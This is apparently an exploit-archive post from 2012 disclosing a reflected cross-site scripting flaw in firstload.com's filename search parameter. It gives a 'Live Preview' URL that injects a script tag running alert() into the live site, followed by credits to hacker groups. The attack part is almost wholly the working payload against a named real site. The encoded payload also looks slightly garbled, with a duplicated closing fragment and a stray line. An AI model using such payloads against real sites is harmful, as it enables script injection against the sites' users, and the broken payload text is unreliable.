Firstload.com suffers from a cross site scripting vulnerability.
fe8708399a692ce8a272a89ac63191db1d103668ef36b703b2323bfc1e4ff6cb
# Exploit Title: Firstload.com (usenet Provider) Cross Site Scripting
# Google Dork: -
# Date: 30/3/2012
# Author: Crim3R
# contact : Crim3R@att.net
# Tested on: ALL
# CVE : XSS
######Vulnerable########
searching for filenames is Vulnerable to Cross Site Scripting
http://www.firstload.com/?uniq=1364f75a67db1bc2&log=47382&fn=
######Live Preview########
Sites:
http://www.firstload.com/?uniq=1364f75a67db1bc2&log=47382&fn=%3Cscript%3Ealert%28%27Crim3R%27%29%3B%3C%2Fscript%3Eript%3E&lang=en
n
######Credit########
Sepehr-team.org
h4ckcity.org
zarbat.org
H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel -
S.a.S - Net.Plus -
Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -